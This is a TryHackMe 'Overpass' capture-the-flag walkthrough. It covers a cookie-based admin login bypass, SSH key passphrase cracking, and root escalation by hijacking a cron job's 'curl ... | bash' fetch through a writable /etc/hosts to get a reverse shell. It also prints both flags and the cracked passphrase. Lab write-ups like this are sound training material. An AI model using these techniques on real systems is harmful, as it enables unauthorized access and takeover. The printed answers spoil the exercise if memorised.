CTF

EN TR

TryHackMe Overpass — Walkthrough

Jul 11, 2025 • ★★☆☆☆ • 2 min

On this page

Overpass | TryHackMe
1) Nmap Service Scan
2) Directory Enumeration with Dirsearch
3) Admin Login Panel
4) JavaScript Analysis
5) Login Bypass via Cookie
6) Obtaining the SSH Key
7) Converting to Hash with ssh2john.py
8) Cracking with John the Ripper
9) SSH Connection
10) User Flag
11) Crontab Analysis
12) Hostname and Domain Info
13) Request Hijacking
14) Obtaining a Root Shell
15) Root Flag

Overpass | TryHackMe

1) Nmap Service Scan

An nmap scan was run to identify open ports on the target.

Nmap

2) Directory Enumeration with Dirsearch

A directory search was performed against the HTTP service on port 80, surfacing several interesting paths.

Dirsearch

The scan revealed an /admin panel.

Admin Panel

4) JavaScript Analysis

Inspecting the main.js file discovered during the directory scan, we found that setting a SessionToken cookie grants access to the admin panel without proper authentication.

JS Analysis

Setting the SessionToken cookie from the browser console gave us unauthorized access.

Cookie Bypass

6) Obtaining the SSH Key

The admin panel contained a password-protected SSH private key belonging to James, with a note stating the key is encrypted with AES-128-CBC.

SSH Key

7) Converting to Hash with ssh2john.py

The SSH key was converted into a John the Ripper-compatible hash format using the ssh2john.py script.

Convert to Hash

8) Cracking with John the Ripper

Using the rockyou wordlist, the passphrase was cracked: james13

Hash Crack

9) SSH Connection

Using the passphrase together with the private key, an SSH session was established as user james.

SSH Login

10) User Flag

The user.txt file was found in James’s home directory.

thm{65c1aaf000506e56996822c6281e6bf7}

User Flag

11) Crontab Analysis

Inspecting the crontabs revealed a command running every minute as root.

* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

12) Hostname and Domain Info

The /etc/hosts file was inspected to confirm the local domain name of the target: overpass.thm.

At this point, the path to privilege escalation is to interfere with that scheduled command.

Crontab Discovery

13) Request Hijacking

We noticed that the /etc/hosts file is writable by user james. Abusing this, we redirected the target domain to our own IP address so that the cron job would fetch a malicious script from us.

A simple HTTP server was started to serve the file from our IP, which the target dutifully requested.

14) Obtaining a Root Shell

Within a minute, a reverse shell with root privileges connected back.

Root Shell

15) Root Flag

With root privileges, root.txt was read to obtain the final flag.

thm{7f336f8c359dbac18d54fdd64ea753bb}

All steps completed successfully — full control over the target was achieved.